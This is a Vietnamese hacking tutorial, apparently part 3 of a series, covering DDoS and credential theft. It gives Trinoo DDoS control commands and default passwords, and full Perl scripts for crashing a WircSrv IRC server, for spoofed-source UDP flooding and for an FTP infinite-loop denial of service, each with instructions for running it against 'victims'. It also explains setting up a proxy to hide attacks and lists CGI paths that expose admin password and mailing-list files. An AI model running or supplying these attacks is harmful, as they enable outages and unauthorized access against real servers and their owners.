Những hiểu biết cơ bản nhất để trở thành Hacker phần 3 41 . ) Tấn công DDoS thông qua Trinoo : _ Bạn đã biết DDoS attack là gì rồi phải không ? Một cuộc tấn công DDoS bằng Trinoo được thực hiện bởi một kết nối của Hacker Trinoo Master và chỉ dẫn cho Master để phát động một cuộc tấn công DDoS đến một hay nhiều mục tiêu.
Trang 1Những hiểu biết cơ bản nhất để trở thành Hacker phần 3
trang này đã được đọc lần
41 ) Tấn công DDoS thông qua Trinoo :
_ Bạn đã biết DDoS attack là gì rồi phải không ? Một cuộc tấn công DDoS bằng Trinoo được thực hiện bởi một kết nối của Hacker Trinoo Master và chỉ dẫn cho Master để phát động một cuộc tấn công DDoS đến một hay nhiều mục tiêu Trinoo Master sẽ liên lạc với những Deadmons đưa những địa chỉ được dẫn đến để tấn công một hay nhiều mục tiêu trong khoảng thời gian xác định _ Cả Master và Deamon đều được bảo vệ bằng Passwd chỉ khi chúng ta biết passwd thì mới có thể điều khiển được chúng , điều này không có gì khó
khăn nếu chúng ta là chủ nhân thực sự của chúng Những passwd này thường được mã hoá và bạn có thể thiết lập khi biên dịch Trinoo từ Source ->
Binnary Khi được chạy , Deadmons sẽ hiện ra một dấu nhắc và chờ passwd nhập
vào , nếu passwd nhập sai nó sẽ tự động thoát còn nếu passwd được nhập đúng thì nó sẽ tự động chạy trên nền của hệ thống
attacker$ telnet 10.0.0.1 27665
Trying 10.0.0.1
Connected to 10.0.0.1
Escape character is '^]'
kwijibo
Connection closed by foreign host < == Bạn đã nhập sai
attacker$ telnet 10.0.0.1 27665
Trying 10.0.0.1
Connected to 10.0.0.1
Escape character is '^]'
betaalmostdone
trinoo v1.07d2+f3+c [rpm8d/cb4Sx/]
trinoo> < == bạn đã vào được hệ thống trinoo
_ Đây là vài passwd mặc định :
“l44adsl": pass của trinoo daemon
"gorave": passwd của trinoo master server khi startup
"betaalmostdone": passwd điều khiển từ xa chung cho trinoo master
"killme": passwd trinoo master điều khiển lệnh "mdie"
_ Đây là một số lệnh dùng để điều khiển Master Server:
Trang 2CODE
die -Shutdown
quit -Log off
mtimer N -Đặt thờI gian để tấn công DoS , vớI N nhận giá trị từ 1 > 1999 giây
dos IP -Tấn công đến một địa chỉ
IP xác định
mdie pass -Vô hiệu hoá tất cả các
Broadcast , nếu như passwd chính xác Một lệnh đưọc gửi tới ("d1e l44adsl") Broadcast để Shutdown chúng Một passwd riêng biệt sẽ được đặt cho mục này
mping -Gửi một lệnh ping tới ("png l44adsl") c¸c Broadcast
mdos <ip1:ip2 > -Send nhiều lênh DOS ("xyz l44adsl
123:ip1:ip2") đến các Broadcast
info -Hiển thị thông tin về
Trinoo
msize -Đặt kích thước đệm cho những gói tin được send đi trong suốt thờI gian DoS
nslookup host -Xác định tên thiết bị của Host mà Master Trinoo đang chạy
usebackup -Chuyển tớI các file
Broadcast sao
lưu được tạo bởi lệnh “killdead”
bcast -Liệt kê danh sách tất cả các Broadcast có thể khai thác
help [cmd] -Đưa ra danh sách các lệnh
mstop -Ngừng lại các cuốc tấn công DOS
_ Đây là một số lệnh dùng để điều khiển Trinoo Deadmons:
CODE
aaa pass IP -Tấn công đến địa chỉ IP
đã xác định GửI gói tin UDP (0-65534) đến cổng của UDP của địa chỉ IP đã xác định trong một khoảng thời gian xác định được mặc định là 120s hay từ 1 >1999 s
bbb pass N -Đặt thờI gian giới hạn cho các cuộc tấn công DOS
Trang 3Shi pass -Gửi chuỗi “*HELLO*” tới dánh sách Master Server đã được biên dịch trong chương trình trên cổng
31335/UDP
png pass -Send chuỗi “Pong” tớI Master
Server phát hành các lệnh điều khiển trên cổng 31335/UDP
die pass -Shutdown Trinoo
rsz N -Là kích thước của bộ đệm được dùng để tấn công , nó được tính bằng byte
xyz pass 123:ip1:ip3 -tấn công DOS nhiều mục tiêu
cùng lúc
42 ) Kỹ thuật ấn công DoS vào WircSrv Irc Server v5.07 :
_ WircSrv IRC là một Server IRC thông dụng trên Internet ,nó sẽ bị Crash nếu như
bị các Hacker gửi một Packet lớn hơn giá trị ( 65000 ký tự ) cho phép đến Port
6667
Bạn có thể thực hiện việc này bằng cách Telnet đến WircSrv trên Port 6667: Nếu bạn dùng Unix:
[hellme@die-communitech.net$ telnet irc.example.com 6667
Trying example.com
Connected to example.com
Escape character is '^]'
[buffer]
Windows cũng tương tự:
telnet irc.example.com 6667
Lưu ý: [buffer] là Packet dữ liệu tương đương với 65000 ký tự
Tuy nhiên , chúng ta sẽ crash nó rất đơn giản bằng đoạn mã sau ( Các bạn hãy nhìn vào đoạn mã và tự mình giải mã những câu lệnh trong đó , đó cũng là một trong những cách tập luyện cho sự phản xạ của các hacker khi họ nghiên cứu Nào , chúng ta hãy phân tích nó một cách căn bản ):
CODE
#!/usr/bin/perl #< == Đoạn mã này cho ta biết là dùng cho các lệnh trong perl use Getopt::Std;
use Socket;
getopts('s:', \%args);
Trang 4if(!defined($args{s})){&usage;}
my($serv,$port,$foo,$number,$data,$buf,$in_addr,$paddr,$proto);
$foo = "A"; # Đây là NOP
$number = "65000"; # Đây là tất cả số NOP
$data = $foo x $number; # kết quả của $foo times $number
$serv = $args{s}; # lệnh điều khiển server từ xa
$port = 6667; # lệnh điều khiển cổng từ xa , nó được mặc định là 6667
$buf = "$data";
$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");
socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
connect(S, $paddr) ||die ("Error: $!");
select(S); $| = 1; select(STDOUT);
print S "$buf";
print S "$buf";
print("Data has been successfully sent to $serv\n");
sub usage {die("\n\n Lỗi WircSrv Version 5.07s
có thể tấn công bằng DoS \n gửi 2 64k gói tin đến server làm cho nó crash.\n -s server_ip\n\n");}
Để sử dụng cái mã này , bạn hãy save nó vào một file *.pl , rồI down chương trình activeperl về sài , setup nó rồi vào HĐH DOS bạn chỉ cần gọi file này ra theo lệnh sau :
C:\>perl < đường dẫn đến file *.pl >
( Đến bây giờ tôi sẽ không bày thật cặn kẽ nữa mà sẽ tăng dần độ khó
lên , nếu bạn nào nghiên cứu kỹ các bài trước thì các bạn sẽ làm được
dễ dàng thôi )
43 ) Kỹ thuật tấn công DoS vào máy tính sử dụng HĐH Win2000 :
_ Muốn sử dụng được nó , bạn phải có activeperl , rồi sử dụng như hướng dẫn tương tự trên Save đoạn mã vào file *.pl rồI dùng lệnh perl gọi nó ra :
CODE
#!/usr/bin/perl -w
use Socket;
use Net::RawIP;
use Getopt::Std;
Trang 5getopts("s:d:p:l:n:v:t:f:T:rL",%o);$ver="0.3a";$0=~s#.*/##;
print" - $0 v.$ver b/ Nelson Brito / Independent Security Consultant - ";
$l=$o{'l'}?$o{'l'}+28:800+28;$n=$o{'n'}?$o{'n'}/2:800/2;
$v=$o{'v'}||4;$t=$o{'t'}||1;$f=$o{'f'}||0;$T=$o{'T'}||64;
$p=$o{'p'}?$o{'p'}:(getservbyname('isakmp','udp')||die"getservbyname: $! ");
($o{'s'}&&$o{'d'})||die
" Use: $0 [IP Options] [UDP Options] ",
"IP Options: ",
" -s* Đia chi nguon đe bat chuoc ",
" -d* Đia chi bi tan cong ",
" -v IP Version (def: $v) ",
" -t IP Type of Service (TOS) (def: $t) ",
" -f IP fragementation offset (def: $f) ",
" -T IP Time to Live (TTL) (def: $T) ",
"UDP Options: ",
" -p cong cua may tinh nan nhan (def: $p) ",
" -l chieu dai cua goi tin (def: $l) ",
" -r cai đat du lieu ngau nhien (def: ".") ",
"Generic: ",
" -n So luong goi tin ta muon gui đi (def: $n) ",
" -L gui goi tin lien tuc khong ngung cho đen khi may tinh cua nan nhan bi die he he",
" Bai huong dan cua ANHDENDAY ";
while($n > 0){
$|=1;print".";$sp=int rand 65535;
$D=$o{'r'}?(chr(int rand 255)) x $l:"." x $l;
$nb=new Net::RawIP({
ip=>
{
version=>$v,
tos=>$t,
ttl=>$T,
frag_off=>$f,
saddr=>$o{'s'},
daddr=>$o{'d'}
},
udp=>
{
source=>$sp,
dest=>$p,
len=>$l,
data=>$D
Trang 6}
});
$nb->send;undef $nb;!$o{'L'}&&$n ;
}
print"Finish! ";
_ Khi gọi ra bạn hãy chọn tuỳ chọn đã ghi ở trong đó mà DoS Nhớ là chỉ dùng cho Win2000 nhé
44 ) Kỹ thuật tấn công DoS dễ dàng nhất :
_ Tôi thì mỗi lần muốn tấn công bằng DoS đều dùng chương trình này , nó chẳng kén gì cả và dễ thực hiện Bây giờ tôi sẽ chia sẻ với các bạn
_ Bạn cần phải có Activeperl ( lại là activepert ) đã cài sẵn , save đoạn mã sau vào file abc.pl :
CODE
#!/usr/bin/perl
use IO::Socket;
sub initiate {
if ($ARGV[0] eq '') {die "Usage: perl abc.pl <host> <port> <username>
<password>\nVi du : perl
abc.pl 127.0.0.1 21 anonymous me@\n";}
$host = $ARGV[0];
$port = $ARGV[1];
$user = $ARGV[2];
$pass = $ARGV[3];
};
sub connecttoserver {
print("Connect den host: $host\n");
$socket = IO::Socket::INET->new (PeerAddr => $host,
PeerPort => $port,
Proto => "tcp",
Type => SOCK_STREAM
) || die "khong the connect den $host";
print "Connect thanh cong Loggin vao \n";
};
Trang 7sub login {
print "user $user\n";
print $socket "user $user\r\n";
$response = <$socket>
print "$response\n";
print "pass $pass\n";
print $socket "pass $pass\r\n";
$response = <$socket>
print "$response\n";
print "Logged in Dang tan cong DoS doi phuong Nhan CTRL-C de ngung.\n"; };
sub doit {
for (;; ){
print "retr a:/x\n";
print $socket "retr a:/x\r\n";
$response = <$socket>
print "$response";
}
}
initiate();
connecttoserver();
login();
doit();
_Nếu bạn từng qua lập trình khi đọc đoạn mã bạn sẽ thấy rằng đoạn mã
này dùng chính thông tin từ ổ đĩa A của nạn nhân để tấn công nạn nhân Nó
sử dụng vòng lặp không có giới hạn từ hàm $socket "retr a:/x\r\n" Khi muốn kết thúc bạn chỉ cần nhấn ctrl+C
_Cuối cùng là bạn chỉ cần gọi nó ra thông qua lệnh perl như các bài trên VD :
perl abc.pl http://www.xxx.com/ anonymous me
trong đó User name và Password có thể là bất kỳ
Vậy là coi như các bạn đã biết tấn công DoS là như thế nào rồi phải không ?
Đó chỉ là những cách tấn công DoS thông thường ( nhưng hậu quả thì chẳng thường thường chút nào ) , còn các kỹ thuật DoS lợi hại khác như DRDoS thì cho các bạn nghiên cứu thêm vậy Nó rất nguy hiểm khi sử dụng lung tung nên để
Trang 8dành phần đó cho các bạn nào thích và thật sự muốn nghiên cứu về nó Tôi xin dừng phần DoS tại đây
45 ) Tự tạo cho mình một proxy để sài :
_Trong các công việc như tấn công DoS hay đột nhập vào trang Web có trang bị firewall thì bạn cần đến proxy để sài Do đó các bạn hãy tự tạo cho mình
một cái proxy made in <yourname> sài cho nó oai Bây giờ hãy làm cùng tôi _ Trước hết bạn đăng ký một host miễn phí ở trang free.prohosting.com Bạn hãy
khai báo thông tin về bạn trong các ô nhập thông tin Cuối cùng khi đăng ký xong
bạn sẽ nhận được Mail từ trang Web này gửi đến , hãy test nó để lấy pass
mặc định mà nó cho bạn
_ Tiếp theo bạn vào trang www.xav.com , rồi nhấp vào link install phía dưới dòng
chữ Test - script Package( tui nhớ là có 2 cái tên mang chữ script này ) Sau đó bạn nhấn "next" và nhìn ở phía dưới của trang này có chữ show all verdon , bạn hãy nhấn vào đó
_ Tiếp tục bạn nhấn James Marshall ==>CGIscript
==>CGIproxy==>Next==>accept==> cho đến
khi bạn thấy một cái bảng có nhiều ô nhập thông tin Bạn hãy nhập thông tin vào các trang đó :
+ your Website : nhập địa chỉ trang Web của bạn đã đăng ký trong
prohosting.com
+ FTP username : Bạn nhập username mà bạn đã đăng ký trong prohosting.com
+ FTP password : Bạn nhập passwd mà prohosting.com đã send về mail cho bạn
+ Mấy cái còn lại không cần thiết , bạn nhấp next để tiếp tục Rồi nhấn
finish
+ Cuối cùng nó sẽ cho bạn địa chỉ bạn vừa tạo cái proxy đó , bạn hãy ghi
nhớ nó Sau này mỗi lần “hành động” thì bạn lại đem ra sài
46 ) Kỹ thuật lấy pass thông qua lỗi của một số Script :
a ) Calendar CGI Script :
_ Một trong số những scripts đã tìm thấy điểm yếu đó là calendar scripts , nó nằm trong thư mục cgi-bin/calendar, file config là file calendar.cfg chứa
administrator
username và password để thay đổi chọn lựa cho scripts khi cần , cái này có thể tìm thấy ở cuối file calendar.cfg , tuy nhiên chúng đã được mã hoá chúng ta chỉ
Trang 9việc dùng John The Ripper hay những công cụ khác để giải mã nó là xong : _file calendar.cfg thường đặt tại địa chỉ sau :
http://www.xxx.com/cgi-bin/calendar/calendar.cfg
sau khi crack xong chúng ta sẽ đến Admin Control Login vào địa chỉ :
http://www.xxx.com/cgi-bin/calen _admin.pl?admin
_ Vậy là bạn đã có được quyền admin rồi đó
b ) WebBBS Script :
_WebAdverts Script là một scripts cho phép webmasters hiển thị những biểu ngữ luân
phiên ( quảng cáo chẳng hạn ) hay thêm vào trong trang Web , cuối cùng bạn có thể
sử dụng kết hợp password và username để cài đặt banners tạo một banner accounts
mới , xoá accounts view sensitive info, vv.vv
_Địa chỉ passwd của WebAdverts là :
http://www.xxx.com/cgi-bin/advert/adpassword.txt
sau khi giải mã bạn logging vào:
http://www.xxx.com/cgi-bin/advert/ads_admin.pl
để login như là script administrator
c ) WWWBoard Script :
_WWWBoard có file password có thể tìm thấy trong pasword.txt , chúng ta hãy search nó
bằng từ khoá cgi-bin/wwwebboard hoặc webboard/password.txt
d ) Mailmachine Script :
_Mailmachine.cgi là một webbased mailinglist , bạn có thể trông thấy file
adressed.txt
chứa tất cả danh sách khách đã đăng ký , những danh sách có thể thấy tại
những urls sau:
http://www.xxx.com/cgi-bin/mailman/addresses.txt
Trang 10http://www.xxx.com/cgi-bin/maillist/addresses.txt
http://www.xxx.com/cgi-bin/mail/addresses.txt
bạn cũng nên tìm addresses.txt mà đôi khi chúng được đổi thành các tên khác Chúng có thể chứa các thông tin quan trọng cho phép bạn khai thác
Việc tìm ra các trang bị lỗi này hẳn các bạn đã biết , tôi sẽ không nhắc
lại nữa ( Nếu ai chưa biết thì vui lòng đọc lạI những phần trước )
=================================================
=====
Nhân đây tôi xin đính chính lại là trong các đoạn code mà tôi phân tích và post lên ở những phần trước tôi đã sơ ý không thêm ký hiệu “#” vào trước
những câu phân tích đó , dẫn đến việc một số bạn thắc mắc là đoạn code
không hoạt động Tôi thành thật xin lỗi các bạn vì sơ ý của tôi , các bạn
chỉ cần lấy đoạn code đó ra và thêm vào dấu “ # ” ở phía trước dòng chú
thích Tiếng Việt của tôi là được ( Thông thường tôi có sử dụng dấu “ <
== ” để giải thích ở phiá đuôi đoạn code đó Các bạn hãy để ý mà fix
nhé
47 ) Các công cụ cần thiết để hack Web :
_ Đối với các hacker chuyên nghiệp thì họ sẽ không cần sử dụng những công
cụ này mà họ sẽ trực tiếp setup phiên bản mà trang Web nạn nhân sử dụng trên máy của mình để test lỗi Nhưng đối với các bạn mới “vào nghề”
thì những công cụ này rất cần thiết , hãy sử dụng chúng một vài lần bạn
sẽ biết cách phối hợp chúng để việc tìm ra lỗi trên các trang Web nạn nhân được nhanh chóng nhất Sau đây là một số công cụ bạn cần phải có trên
máy “làm ăn” của mình :
_ Công cụ thứ 1 : Một cái proxy dùng để che dấu IP và vượt tường lửa khi cần ( Cách tạo 1 cái Proxy tôi đã bày ở phần 7 , các bạn hãy xem lại nhé )
_ Công cụ thứ 2 : Bạn cần có 1 shell account, cái này thực sự quan trọng đối với bạn Một shell account tốt là 1 shell account cho phép bạn chạy các chương trình chính như nslookup, host, dig, ping, traceroute, telnet, ssh, ftp, và shell account
đó cần phải cài chương trình GCC ( rất quan trọng trong việc dịch (compile) các exploit được viết bằng C) như MinGW, Cygwin và các dev tools khác
Shell account gần giống với DOS shell,nhưng nó có nhiều câu lệnh và chức năng hơn DOS Thông thường khi bạn cài Unix thì bạn sẽ có 1 shell account, nếu bạn không cài Unix thì bạn nên đăng ký trên mạng 1 shell account free hoặc nếu có
ai
đó cài Unix và thiết lập cho bạn 1 shell account thì bạn có thể log vào telnet